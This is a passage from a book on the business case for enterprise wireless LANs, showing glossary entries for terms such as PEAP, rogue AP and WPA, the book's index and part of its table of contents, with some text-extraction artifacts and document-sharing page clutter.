wireless LANs.
Federal Information Processing Standard (FIPS) 140-2

FIPS 140 are the current, highly secure, encryption standards required by the U.S. federal
government for use within government agencies. FIPS 140 mandates the use of Advanced
Encryption Standard, implemented in 802.11i (the newest wireless security standard) for use with
government data.
FHSS
Frequency-Hopping Spread-Spectrum. One of two types of spread-spectrum radio technology
used in WLAN transmissions. FHSS modulates the data by hopping from frequency to frequency in
the same band in a predetermined manner.
G
greenfield deployment
A deployment in an environment where no network has previously been in place. Named
greenfield in reference to the fact that most "new" buildings and solutions were supposed to have
been built in green fields.
H
hash
A one-way algorithm from which it is very difficult, if not impossible, to derive the original input.
Hashing is an encryption technique that is used to generate WEP keys and TKIP rehashed keys.
Hashes are also used to validate message integrity and to establish the identity of a sender.
HiperLAN
High-performance radio local-area network. A competing technology to 802.11a, which works in
the same 5-GHz ISM band. Developed in Europe by the European Telecommunications Standards
Institute (ETSI), HiperLAN has not seen widespread use.
hotspot
A publicly accessible WLAN network. Wireless hotspots are often provided free, either as public
amenities or for a small fee in cafes, coffee shops, malls, and so on. With the increasing popularity
of WLANs and wireless devices, the number of public hotspots is also rising rapidly.
I
IAPP
InterAP Protocol. A protocol being developed to support interoperability, mobility, handover, and
coordination among APs in a WLAN. IAPP enables APs to communicate with one another.
IEEE
Institute of Electrical and Electronic Engineers. An international organization of professionals
whose activities include the development of communication and network standards. IEEE LAN
standards are the predominant LAN standards today; this includes the wireless LAN standards.
IETF
The Internet Engineering Task Force (IETF) is an international organization dedicated to the
development of the Internet through technical recommendations and specifications. It is not
responsible for the establishment of standards, but it is the principal body for the development of
specifications, many of which are later adopted as standards.
infrastructure network
Refers to an 802.11 framework in which communication takes place via an access point. In
infrastructure mode, wireless devices use the AP to communicate with each other and with devices
on a wired network. Most corporate WLANs operate in infrastructure mode to access the wired
LAN.
initialization vector
See IV.
Institute of Electrical and Electronic Engineers

See IEEE.
interference
In wireless terms, the RF effects that occur when other signals, usually in the same frequency
range, inhibit or negatively affect the reception of the originally desired signal.
Internet Engineering Task Force

See IETF.
IPsec
IP Security. IPsec is a security protocol defined by the Internet Engineering Task Force (IETF) that
provides authentication and encryption over the Internet. IPsec is generally used to create VPNs.
ISO
International Organization for Standardization. An international organization of national standards
bodies from many countries.
IV
Initialization vector. In encryption, random data used to make a message unique. The IV is usually
a block of bits that is used to "scramble" the data you want to encrypt. WEP uses a 24-bit IV
value.
K
key
A value that must be fed into the algorithm used to decode an encrypted message to reproduce
the original plain text. Some encryption schemes use the same (secret) key to encrypt and
decrypt a message, but public key encryption uses a "private" (secret) key and a "public" key that
is known by all parties.
key management
The process of managing the creation and distribution of keys in an encryption framework. This
was a major problem with early deployments of static WEP-based wireless LANs because every
access point and client had to have the keys manually configured. Newer EAP mechanisms
introduce key management functionality.
L
LBS
Location-based services. A term used to describe the ability of products to detect and (usually
graphically) display the location of devices on a wireless network. LBS is often used to track
expensive assets by fixing "asset tags" (small battery-operated 802.11-based transmitters). These
devices transmit their location to nearby access points, which in turn send this information to the
location server or management tool. RFID is a form of location-based services.
loss
The reduction of an RF signal due to distance, obstructions, or attenuation.
LWAPP
Lightweight Access Point Protocol. A protocol used to control so-called "lightweight" access points
and to split the management and control functions between the AP and a separate WLAN
controller. This greatly reduces the complexity of configuring and managing WLANs because each
access point does not need to be managed and configured manually; the WLAN controller takes
over this function.
M
MAC address
Media Access Control address. A 6-byte hexadecimal address that a manufacturer assigns to the
Ethernet controller for a port. Effectively, every Ethernet device has a unique MAC address that is
used by higher-layer protocols.
MD5
Message-Digest Algorithm 5. A 128-bit one-way hashing algorithm used in many authentication
algorithms. It is now generally considered unsuitable for strong encryption.
Megahertz
A measure of electromagnetic wave frequency equal to one million (1,000,000) hertz, often
abbreviated as MHz.
MIC
Message Integrity Check. A method to check the integrity of wireless packets to ensure that they
have not been intercepted and modified. Forms part of WPA.
MS-CHAP
Microsoft Challenge Handshake Authentication Protocol. Microsoft's extension to CHAP. MS-CHAP is
a mutual authentication protocol that also permits a single login in a Microsoft network
environment.
mW
Milliwatt. A unit of power equal to one thousandth of a watt. WLANs measure power in mW.
O
OFDM
Orthogonal Frequency Division Multiplexing. OFDM encodes traffic by splitting and spreading it into
several smaller frequency bands transmitted concurrently. This method provides more effective
bandwidth and is less susceptible to interference. OFDM is used in 802.11a and 802.11g WLAN
specifications to produce higher bandwidth levels.
P
PEAP
Protected Extensible Authentication Protocol. PEAP is an EAP mechanism that authenticates
wireless LAN clients using only server-side digital certificates. An encrypted SSL/TLS tunnel
between the client and the authentication server is created and used to protect the subsequent
user authentication exchange.
PKI
Public key infrastructure. A system or framework where digital certificates, certificate authorities,
and other registration authorities verify and authenticate the validity of each party involved in a
network transaction. PKI uses public and shared keys to encrypt and decrypt data.
Plenum
The interstitial space between the raised floor and lowered ceiling, where most air ducts are
situated.
PoE
Power over Ethernet. A technique used to deliver direct current (DC) power over twisted-pair
cables to Ethernet devices. This approach obviates the need for these devices to be connected
directly to a mains power-supply socket. The IEEE standard for PoE is called 802.3af.
PSK
Pre-shared key. The IEEE 802.11 term for a shared secret, also known as a shared key. Preshared keys form an important part of WPA when used in WPAPSK mode. This allows a small or
SOHO wireless network to use the enhancements of WPA without using an EAP server. Pre-shared
keys play a fundamental part in many encryption frameworks.
Q
QoS
Quality of service. A networking technology that seeks to measure, improve, and guarantee
transmission rates, error rates, and other performance characteristics based on priorities, policies,
and reservation criteria arranged in advance. Some protocols allow packets or streams to include
QoS requirements.
R
RA
Registration authority. An optional PKI entity that has responsibility for recording or verifying some
or all the information contained in a certificate request. It effectively validates information relating
to the people, or groups of people, who request a certificate.
radio
A generic term used throughout this book to refer to any radio-based interface
(transmitter/receiver) that provides network access via the 2.4-and 5-GHz frequency ranges.
RADIUS
Remote Authentication Dial-In User Service. A client/server-based authentication and accounting
system. RADIUS was originally developed as a AAA framework for dial-up users, but it is now
widely used for broadband and enterprise networking.
RF
Radio frequency. The rate at which the radio waves oscillate. Higher-frequency rates indicate more
rapid oscillations. 802.11b and 802.11g utilize the 2.4-GHz frequency range, whereas 802.11a
utilizes the 5-GHz range.
roaming
A client process that maintains network access when moving between Layer 2 and Layer 3
networks. For example, on a WLAN with multiple access points, a client "roams" when it moves
through the building, associating with different access points as it changes position. This occurs as
the client device associates with the nearest access point (or the one with the greatest signal).
While moving about, the signal strength changes. This in turn triggers an event causing the client
to search for and, if possible, associate with an access point with a higher signal strength.
Effectively, the client has "jumped" from access point to access point. This event is known as
Layer 2 roaming.
rogue AP
Any access point physically connected to, or interfering with, your enterprise network that was not
installed, managed, or approved by your enterprise IT department. Rogue APs are a serious
security threat because they are often misconfigured (or have no security enabled at all). This is
effectively providing hackers with an open "back door" into your network. 99 percent of rogue APs
are non-malicious; that is, they are simply installed by your users in good faith but without proper
knowledge or familiarity with your wireless networking policies.
ROI
Return on investment. The amount of time required for a product, system, or service to pay for
itself as a direct result of operating efficiencies or productivity improvements that it provides.
RSN
Robust Security Network. A new concept introduced by 802.11i that requires the use of dynamic
negotiation of authentication and encryption algorithms between access points and mobile devices.
RSN will allow the WLAN to evolve with emerging standards, which can be negotiated between the
clients and infrastructure as they are introduced.
S
Secure Shell protocol (SSH)
A Telnet-like protocol that establishes an encrypted session.
session
The series of communication transactions between a client device and specific station in a wireless
network.
shared secret
A shared secret is a string of text or numbers that is communicated between two parties in an outof-band connection. Also known as a shared key or pre-shared key (PSK), a shared secret is used
as input to a one-way hash algorithm.
SIP
Session Initialization Protocol. A signaling protocol that establishes real-time calls and conferences
over IP networks.
spectrum
Electromagnetic radiation arranged in order of wavelength with certain radio bands reserved for
specific servicesfor examplepolice, fire, WLAN, and so on.
SSH
Secure Shell protocol. A Telnet-like protocol that establishes an encrypted session.
SSID
Service set identifier. The unique name shared among all computers and other devices in a
wireless LAN (WLAN). SSIDs can be thought of as the "network name," and they are commonly
used by network users to recognize specific wireless LANs. In enterprise WLANs, the same SSID is
usually shared among all access points. This allows a client device to recognize the WLAN as the
same logical network as it roams from AP to AP. A common SSID (or "network name") is used
across all access points.
Furthermore, access points can support more than one SSID. This would allow an enterprise
WLAN, for example, to have two or three different SSIDs, with different security settings, available
on the same access points. Common examples would be for a WLAN to have different SSIDs for
laptop users, wireless phone users, and maybe even guest users.
STA
Station. Any device that has a wireless network interface. All wireless clients and access points can
be considered stations.
Station
See STA.
Supplicant
A client role in the 802.1x framework. This is basically the client device (or user) that wants to be
authenticated for access to the network. Supplicant is a term used to describe the device that is
attempting to access the network in an authentication event.
T
TCO
Total cost of ownership. The complete costs of owning a product, system, or service. Total cost of
ownership will include the capital acquisition cost, installation, maintenance, training, technical
support, and labor to make required changes to related products, systems, or services. Most
estimates place the TCO at about three to four times the capital acquisition price for the product,
system, or service.
TKIP
Temporal Key Integrity Protocol. TKIP is an encryption protocol that adds a function whereby each
packet is rehashed as part of the Message Integrity Check (MIC). A hashing function is used to
provide a new key for each packet, thereby greatly increasing the security when compared to the
static keys offered by WEP. TKIP utilizes the RC4 stream cipher with 128-bit keys for encryption
and 64-bit keys for authentication. TKIP is a fundamental part of WPA, WPA2, and 802.11i.
Total cost of ownership

See TCO.
U
UNII
Unlicensed National Information Infrastructure. The Unlicensed National Information Infrastructure
(UNII) bands have three groupings, with different frequency ranges, maximum transmit power,
and permitted transmission areas.
Band
Frequency
Area
UNII-1
5.155.25 GHz
Outdoor use
only
UNII-2
5.255.35 GHz
Indoor and
outdoor use
UNII-3
5.7257.825
GHz
Indoor and
outdoor use
user
In the context of this book, a person who uses a wireless client.
V
VLAN
Virtual LAN. A MAC layer network segmentation that logically binds devices to the same LAN,
regardless of their physical location.
VoIP
Voice over IP. A networking standard that allows voice telephony services over IP connections.
VPN
Virtual private network. The use of encryption protocols in the lower protocol layers to provide a
secure connection through an otherwise insecure network, typically the Internet. VPNs are also
referred to as secure tunnels.
W
war driving
The act of collecting data on unsecured or poorly secured WLANs while driving. Depending on the
mode of transportation, this can also be known as war walking, war flying, and so on. The intent of
war driving is to identify potential security weaknesses and make public the information or access
the network for hacking or "free" Internet services.
war walking
Conceptually identical to war driving, but carried out on foot.
WECA
Wireless Ethernet Compatibility Alliance. The former name of the Wi-Fi Alliance.
WEP
Wired Equivalent Privacy (WEP) protocol. An encryption standard that defines mechanisms for data
transmitted in WLANs. WEP is based on an RC4 algorithm and originally used 40-bit keys but was
later enhanced to support 128-bit keys. Subsequently, proprietary 256-bit implementations were
introduced by many equipment manufacturers.
Wi-Fi
Wireless Fidelity. Wi-Fi is a brand name created by the Wi-Fi Alliance (formerly WECA Wireless
Ethernet Compatibility Alliance) to describe interoperable and standards-based 802.11 wireless
networks and to promote the use and public adoption of wireless networks. WLAN products that
are Wi-Fi certified are interoperable and compliant with the latest standards set down by the Wi-Fi
Alliance. The Wi-Fi Alliance has instituted a test suite that defines how member products are tested
to certify that they are interoperable with other Wi-Fi certified products. These tests are conducted
at an independent laboratory.
Wi-Fi Alliance
The Wi-Fi Alliance is a global, cross-industry organization created in 1999 to promote
interoperability, certify products as compliant with the latest standards, and ensure independent
testing. Note that the Wi-Fi Alliance does not define standards but simply adopts them as part of
the Wi-Fi certification.
Wi-Max
Worldwide Interoperability for Microwave Access. Wi-Max is an 802.16 standards-based technology
to provide broadband wireless "last mile" connectivity. As a wide-area technology, Wi-MAX (and all
802.16 standards) lies outside the scope of this book.
WLAN
Wireless LAN. A wireless network where clients and access points communicate, most commonly
using standard IEEE-defined communication protocols, such as 802.11a, 802.11b, or 802.11g.
WPA
Wi-Fi Protected Access. WPA is a standards-based, interoperable security enhancement that
provides significantly improved levels of data protection and access control for WLAN systems,
compared to WEP. WPA introduces several new enhancements, including TKIP, MIC, and Key
Management.
WPA2
Wi-Fi Protected Access 2. WPA2 is the Wi-Fi Alliance's marketing term for 802.11i. As such, its
capabilities are the same. See also 802.11i.
Index
[SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [L] [M] [N] [O] [P] [R] [S] [T] [U] [V] [W]
Index
802.11 standards
802.11a standard
802.11g standard, preratification
802.11i authentication standard
802.1x authentication standard
Index
AAA (authentication, authorization, and accounting)
access
access layer (hierarchical networks)
access points versus access layer
access technologies
accounting management
ACS (Cisco Secure Access Control Servers)
ACU (Aironet Client Utility)
ad-hoc WLAN networks
AES (Advanced Encryption Standard)
aggregate annualized monetary benefit, calculating
alerts
analytical processes
AP (access points)
client-to-AP ratio 2nd
configuring
Griffith University case study 2nd
directional antennas
installing
Layer 2 address spoofing, preventing
management policy, implementing
outdoor coverage
physical security
rogue 2nd
detecting 2nd
responding to
securing 2nd
signal strength
minimizing
SSID
testing
application layer
application matrices
architectural guidelines
checklist
defining scope of WLAN
deployment timeframe
infrastructure requirements
Lifespan case study
operational support structure, establishing
requirements, assessing
802.11 standards,
assessing
client-to-AP ratio
global naming standards
radio cell architecture
roaming
signal strength
topology
security posture 2nd
target audience of WLAN
understanding goal of WLAN
ASD (application specific devices)
assessing WLAN architecture requirements
802.11 standards
client-to-AP ratio
roaming
signal strength
topology
asset tags 2nd
battery life
assets, TCO
per-user
Value Chain framework
attenuation
authentication 2nd
802.11i
802.1x
EAP
machine-based
mitigating security threats 2nd
user-based
WPA
automatic site surveys
autonomous AP architecture
availability of AAA
average monthly benefit per user, calculating
Index
bandwidth
as limitation of WLANs
factors influencing
antennas
attenuation
distortion
interference
modulation
multipath
path loss
power
base station model
battery life of asset tags
BBSM (Building Broadband Services Manager)
benchmarking
benefits of global WLAN solution
broadcasting video
budgetary requirements, estimating
building secure WLANs, best practices
"built-in" traffic analysis tools
bus topology
business model
for WLAN deployment
Griffith University education case study
Lifespan case study
manufacturing industry case study
Index
cabling, Griffith University case study
CAGRs (compounded annual growth rates)
calculating
aggregate annualized monetary benefit of WLANs
average monthly benefit per user
daily organizational productivity
IRR
monetized productivity benefit per WLAN
NPV 2nd
office employee productivity benefits
payback period
ROI
total productivity benefit of WLANs
traveling employee productivity benefits
calculating location, methods of
canned reports
case studies
business model
client management
deployment issues
education, Griffith University
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
network management
phases of deployment
project management
security
signal strength
site surveys
"Smart Zones,"
three-tiered service and support system
topology
wireless equipment
WLAN standards
enhanced services
wireless guest networking
wireless voice services
healthcare
architectural principles
business model
enterprise WLAN deployment
network management
patient tracking and telemetry
RFID technology
security
site surveys, performing
WLAN design
manufacturing industry
business model
coverage
guest access
rogue AP detection
security concerns
throughput
VoIP
WLAN deployment
security
technology considerations
architectural requirements
client management
network management
service anad support
CBC-MAC (Cipher Block Chaining Message Authentication Code)
CCX (Cisco Client Extensions) 2nd
CCX (Cisco Compatible Extension) program
CDMA (Code Division Multiple Access)
cellular telephone networks, LBS
centralized management model versus distributed management model
centralized self-service model
centrally funded deployment strategies
Christensen, Clayton
Cisco Aironet 350 Series Access Point
Cisco four-tier support model
Cisco NexGen WLAN project
Cisco Wireless IP Phone 7920
client management 2nd 3rd
Griffith University case study
manual client configuration
client security
client software
client to access point ratio
client-based reporting
client-funded deployment strategies
client-to-AP ratio 2nd
clients checklist
coexistence of IEEE standards

collaborative processes
communication plan, implementing
comparing
centralized and distributed management models
in-house deployment versus outsourced deployment
wired and wireless LANs 2nd
complementary services (WLANs)
compute assets
configuration management
configuring APs
consumer retail industry, identifying key application areas in Value Chain framework
convenience as benefit of WLANs
core layer (hierarchical networks)
CoS (class of service)
cost of support
cost savings of WLANs
cost-benefit analysis
of hybrid wired and wireless LANs
of wired-only LANs
of wireless-only LANs
CPOM (Computer Physician Order Management) application
CSMA (Carrier Sense Multiple Access)
CSMA/CA (Carrier Sense Muliple Access/Collision Avoidance)
Index
Daemen, Joan
daily organizational productivity, calculating
data link layer
defining
home wireless networking policies 2nd
security policy
deploying
enterprise WLANs
AAA architecture dependencies
architecture scalability
business model
case study
communication plan
impact on application portfolio
in manufacturing setting
Lifespan healthcare case study
methodology and project planning checklist
planning phase 2nd
preparation phase 2nd
regulatory issues
security standards
support plan
timeframe as architectural component
guest networks
reasons for
WLAN location services
in transport and shipping companies
deployment checklist 2nd
for architecture
for clients
for deployment methodology and project planning
for infrastructure
design considerations
client-to-AP ratio
roaming
detecting rogue APs
developing project plan
directional antennas
discount rate, selecting
disruptive technology
distortion
distributed management model versus centralized management model

distribution layer (hierarchical networks)
distribution mechanism of video traffic
DMZ
documents, developing project plan
DSSS (Direct Sequence Spread Spectrum) 2nd
dual-band devices
duplex technologies
Index
EAP (Extensible Authentication Protocol)
EAP-FAST (Flexible Authentication via Secure Tunneling) 2nd
EAP-LEAP (Lightweight Extensible Authentication Protocol)
edge devices
edge layer (hierarchical networks)
education case study
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
network management
project management
security
signal strength
site surveys
"Smart Zones,"
topology
wireless equipment
WLAN standards
employee productivity, impact of WLANs
encoding methods
encryption
AES
mitigating security threats
WEP
enhanced services
entertainment/leisure industries, deploying WLAN location services
environmental factors affecting WLAN deployment
governmental
physical attributes of surroundings
RF environment
estimating
budgetary requirements
resource requirements
ETSI (European Telecommunications Standards Institute)
extending coverage outdoors
Index
facilitating value creation process, top-down approach
fan-out ratio
fast Layer 2 roaming
fast roaming
FCAPS
accounting management
configuration management
limitations of
performance management
security management
FCC (Federal Communications Commission)
FDMA (Frequency Division Multiple Access)
financial services industry, identifying key application areas in Value Chain framework
four-tier support model
frequency division duplexing
friendly rogues
FUD (Fear, Uncertainty, Doubt) factor
funding strategies
centrally funded
client-funded
group funded
subscription funded
future of WLANs
Index
goal of WLANs as architectural component
Gore, Rich
governmental considerations
"gray IT" deployments
GRE
AP configuration
AP settings
benefits, measuring
best practices
business model
cabling
challenges faced
client management
network management
project management
security
signal strength
site surveys
"Smart Zones,"
topology
wireless equipment
WLAN standards
group-funded deployment strategies
guest access on manufacturing company enterprise WLAN
guest networking
implementing
reasons for deploying
requirements for 2nd
SSIDs
guest user class
Index
hackers, profile of
hashing
TKIP
HCF (Hybrid Coordination Function)
healthcare industry, deploying WLAN location services
heat maps
Hemendinger, David
hierarchical network model
hierarchy of organizational needs
"high bandwidth" applications
HIPAA (Health Insurance Portability and Accountability Act of 1996)
history of WLANs
home wireless networking policies, defining 2nd
host management
hot-desk user class
Index
identifying risks 2nd
IDS (intrusion detection systems)
IEEE (Institute for Electrical and Electronics Engineers)
coexistence
IEEE 802.11b standard
IEEE 802.11g standard 2nd
implementing
AP management policies
communication plan
guest networks
voice on WLANs
WLAN video
implementing enterprise WLANs
case study
in-house deployment versus outsourced deployment
in-house management
infrastructure checklist
infrastructure layer
asset classes
security
authentication
encryption
hashing
network admission control
infrastructure management
infrastructure mode
infrastructure requirements for WLAN deployment
connectivity
console access
power
installing APs
interception of transmitted data
interference
medical field standards
intermittent connectivity of mobile endpoints
internally developed tools
inventory taking, enhancing effectiveness through WLAN location services
investment in IT infrastructure
investments
IRR, calculating
NPV, calculating 2nd
payback period, calculating

ROI
calculating
IRR (internal rate of return)
calculating
isotropic antennae
IT infrastructure, investment in
Index
launching production services
Law of Large Numbers
Layer 1
Layer 2
address spoofing, preventing
Layer 3
Layer 4
Layer 5
Layer 6
Layer 7
layers of hierarchical network model
LBS (location-based services) 2nd 3rd
legal liability protection as motivation for guest networks
legislation, Sarbanes-Oxley Act
architectural principals
business model
CPOM
enterprise WLAN deployment
network management
patient tracking and telemetry
RFID technology
security
site surveys, performing
WLAN design
distaster recovery
guest networking
RF and interference
limitations of FCAPS
LLC sublayer
location tags
location, methods of calculating
"low bandwidth" applications
LWAPP (Lightweight Access Point Protocol)
Index
MAC sublayer
machine-based authentication
malicious hackers, profile of
man-in-the-middle attacks
management strategies
for clients
for infrastructure
in-house management
outsourced management
user expectations of WLAN video
management tools
third-party WLAN management tools
vendor-specific WLAN management tools
manual site surveys
manufacturing industry
case study
business model 2nd
coverage
guest access
rogue AP detection
security concerns
throughput
VoIP
WLAN deployment
deploying WLAN location services
Value Chain framework, identifying key application areas
Maslow, Abraham
measuring benefits of WLAN deployment on university setting
medical industry, interference standards
Meetinghouse Data Communications
mesh topology
Microsoft Excel, calculating NPV
minimizing AP signal strength
mitigating security threats
with authentication 2nd
802.11i standard
802.1x
WPA
with encryption
with hashing, TKIP
mobile devices, securing
mobile endpoints
intermittent connectivity
mobile user class
mobility
as benefit of WLANs
value of 2nd
modulation
monetized productivity benefit per WLAN, calculating
multipath
multiple access WLAN technologies
multiplex technologies, DSSS
OFDM
Index
Negroponte, Nicholas
NEMA (National Electrical Manufacturers Association) enclosures
NetFlow
network layer
network management
Lifespan case study
platforms
tools
built-in tools
internally developed tools
NetFlow
RADIUS accounting
SNMP
syslog
unique challenges to
dynamic nature of transport medium
mobile nature of wireless endpoints
mobility of endpoints
network-based rogue AP detection
NexGen WLAN project
noise
non-overlapping channels
NPV (net present value)
calculating
Index
OFDM (Orthogonal Frequency Division Multiplexing)
office employee productivity benefits, calculating
office space, security
on-demand viewing
operational support structure, establishing
organizational ecosystem
OSI reference model
application layer
data link layer
network layer
physical layer
presentation layer
session layer
transport layer
out-of-band management
outdoor coverage
outsourced deployment versus in-house deployment
outsourced WLAN management
overlay security solutions
Index
patient tracking and telemetry, Lifespan healthcare case study
"pay as you go" deployment strategy
payback period
calculating
PCAOB (Public Company Accounting Oversight Board)
peer layers
per-user TCO
performance management
performing site surveys for Lifespan healthcare WLAN
phases of deployment, Griffith University case study
physical layer
physical locations
physical security of office space
placement of WLANs
planning phase of solutions lifecycle
defining high-level program plan
documenting project stakeholders
environmental considerations
governmental regulations
identifying users
security strategy
PMBOK (Project Management Body of Knowledge)
PoE (Power over Ethernet)
Porter, Michael E.
Post Implementation Review
post-installation acceptance test
PPDIOO solutions lifecycle 2nd
planning phase
architectural considerations 2nd 3rd
environmental considerations
governmental regulations
identifying users
security strategy
preparation phase
environmental factors
funding strategies
identifying scope of deployment
infrastructure requirements 2nd
pre-deployment tasks
preparation phase of solutions lifecycle
funding strategies
infrastructure requirements
connectivity
console access
power
presentation layer
preventing Layer 2 address spoofing
primary users
probabilistic nature of WLANs
product demonstrations, accessing through guest networks
production services, launching
productivity
average monthly benefit per user, calculating
daily organizational productivity, calculating
impact of WLANs
monetized productivity benefit per WLAN, calculating
office employee benefits, calculating
total productivity benefit of WLANs, calculating
traveling employee benefits, calculating
profiles
project board
project management, Griffith University case study
project plan, developing
Index
radio side protection
radio-based rogue AP detection
RADIUS accounting
real-time video streaming applications
regulatory agencies
regulatory requirements
restrictions on enterprise WLANs
remote access, defining home wireless networking policies 2nd
Renaud, David
requirements for guest networking 2nd
resource requirements, estimating
responding to rogue APs
RF devices, regulations
RF environment
RF fingerprinting
RF management
RF Prediction
RF triangulation
RFID (Radio Frequency Identification)
Rijmen, Vincent
Rijndael
ring topology
risks, identifying
road warriors
roaming 2nd
fast Layer 2 roaming
roaming user class
rogue APs 2nd 3rd
detecting 2nd
on manufacturing company enterprise WLAN
responding to
ROI (return on investment) 2nd 3rd
Index
scalability of AAA
scope of WLAN as architectural component
Scott, Bruce 2nd
secondary users
security
alerts
as architectural component
as reason for guest network deployment
authentication 2nd
EAP
client security
encryption
hashing
IDSs
Lifespan case study
manufacturing industry case study
mobile devices
security management
security models
encryption and authentication with overlay security solutions
machine-based authentication
native authentication only
native encryption and authentication
native encryption only
no authentication, encryption, or hashing
user-based authentication
security policies, defining
security settings management
centralized self-service model
profiles
standardization
third-party wireless software
selecting
discount rate
inhouse versus outsourced deployment
self-actualization
self-healing WLANs
self-throttling throughput strategy
service and support

Cisco four-tier support model
cost of
session layer
signal strength requirements, assessing
signal strength, Griffith University education case study
single points of failure, effect on scalability
site surveys
"Smart Zones,"
Griffith University education case study
sniffing
SNMP (Simple Network Management Protocol)
soft benefits
software, third-party
solutions lifecycle
planning phase
identifying users
security strategy
preparation phase
funding
infrastructure requirements 2nd
SOX (Sarbanes-Oxley Act)
SSIDs (Service Set Identifiers)
on guest networks
SSO (single sign-on)
stakeholders
standard business applications
standard user class
standardization
standards
coexistence
IEEE 802.11a
IEEE 802.11b
IEEE 802.11g
pre-ratification
star topology
storage assets
strategic value of wireless networking
subscription-funded deployment strategies
sunk costs
supplementary services
video
voice
syslog
Index
target audience of WLAN as architectural component
TCO (total cost of ownership)
per user
identifying key application areas
identifying secondary application areas
TDMA (Time Division Multiple Access)
technical support
tertiary institutions
testing APs
third-party tools
wireless client software
WLAN management tools
threats to security
interception
mitigating
with authentication 2nd
with encryption
with hashing
rogue APs
three-tiered service and support system, Griffith University case study
throughput, self-throttling strategy
tiered support structure 2nd
time division duplexing
TKIP (Temporal Key Integrity Protocol)
top-down approach to facilitating value creation process 2nd
topological considerations for WLAN deployment
topologies, Griffith University education case study
total productivity benefit of WLANs, calculating
tracking and telemetry, Lifespan healthcare case study
traffic, sniffing
transactional processes
transmit channels
transport and shipping companies, deploying WLAN location services
transport assets
transport layer
traveling employee productivity benefits, calculating
trend reporting 2nd
trusted WLANs 2nd
types of WLAN users
Index
unaware employees as security threat
unfriendly rogues
UNII (Unlicensed National Information Infrastructure) band
unique challenges to WLAN management
dynamic nature of transport medium
mobile nature of wireless endpoints
untrusted wireless networks 2nd
user-based authentication
Index
identifying key application areas
identifying secondary application areas
value creation process, facilitating with top-down approach 2nd
vendor-specific WLAN management tools
video technologies
broadcasting
distribution mechanism
implementing
on-demand
real-time streaming applications
user expectations, managing
visualization tools
voice technologies
WLAN voice, implementing
VoIP, implementing on manufacturing company enterprise WLAN
Index
WACC (Weighted Average Cost of Capital)
war driving
WECA (Wireless Ethernet Compatibility Alliance)
WEP (Wired Equivalent Privacy)
WIDS (wireless intrusion detection system)
wired networks
wireless equipment, Griffith University case study
WLAN location services 2nd
asset tags
components of
deploying
inventory taking
methods of calculating location
privacy issues
rationale for
WLANs
complementary services
history of
standards, Griffith University education case study
topology, Lifespan case study
video, managing user expectations
voice devices
voice implementation
WLSE (Cisco Wireless LAN Solution Engine) 2nd
WMM (WiFi Multimedia) standard 2nd
workgroup switches
working groups (IEEE)
WPA (Wi-Fi Protected Access)

The Business Case For Enterprise

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

The Business Case For Enterprise

Enviado por

Direitos autorais:

Formatos disponíveis

The Business Case for Enterprise-Class Wireless Lans

By H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier

Table of Contents | Index

A comprehensive guide to analyzing the business rationale for WLANs

The Business Case for Enterprise-Class Wireless Lans

Table of Contents | Index

Chapter 5. Guidelines for A Successful Architecture and Design

Warning and Disclaimer

Publisher Paul Boger

About the Authors

About the Technical Reviewers

Icons Used in This Book

Command Syntax Conventions

Organization and Approach

Appendix C, "Example Project Plan for an Enterprise-Class WLAN Deployment" This

Chapter 1. Introduction to Wireless LAN

OSI Layers and WLANs

Figure 1-1. OSI Reference Model

Layer 1: Physical Layer

Figure 1-2. Network Topologies

Figure 1-3. Attenuation of a Radio Signal

Figure 1-4. Distortion of an RF Signal As It Passes Through Concrete

Figure 1-5. Interference of an RF Wave by a Second Signal

Layer 2: Data Link Layer

Figure 1-6. OSI Data Link Sublayers

Figure 1-7. OSI Technology Reference Chart

Layer 3: Network Layer

Layer 4: Transport Layer

Layer 5: Session Layer

Layer 6: Presentation Layer

Layer 7: Application Layer

A Brief History of WLANs

Table 1-1. Sample of IEEE Working Groups

Video Compression (Digital) Measurement (P1486)

Components and Materials

Organic and Molecular Transistors and Materials

Learning Technology (P1484)

Electronic Power Subsystems (P1515)

How Wireless Networks Function

Figure 1-8. Ad-Hoc WLAN Peer Relationships

Figure 1-9. Infrastructure Mode WLAN

1. Multiple access determines how the cars form a sequence.

Figure 1-11. WLAN Access Technologies

Multiple Access Technology

Figure 1-12. Code Division Multiple Access

Figure 1-13. Frequency Division Multiple Access

Figure 1-14. Time Division Multiple Access

Figure 1-15. Industrial, Scientific and Medical (ISM) Band

Figure 1-16. Unlicensed National Information Infrastructure (UNII) Band

WLAN Radio Communications

Characteristics That Influence WLAN Bandwidth

Path Loss, Power, and Antennas

Attenuation, Distortion, and Interference

Figure 1-17. Multipath Effect

This is implemented in both hardware and software.

Combating External Effects

China Wireless Telecommunication Standard group (CWTS)

Different WLAN Standards

Figure 1-18. 802.11b Range Versus Throughput

Figure 1-19. 802.11g Range Versus Throughput

Figure 1-20. 802.11a Range Versus Throughput

Table 1-2. WLAN Standards

48, 36, 24, 18, 12, 9, 6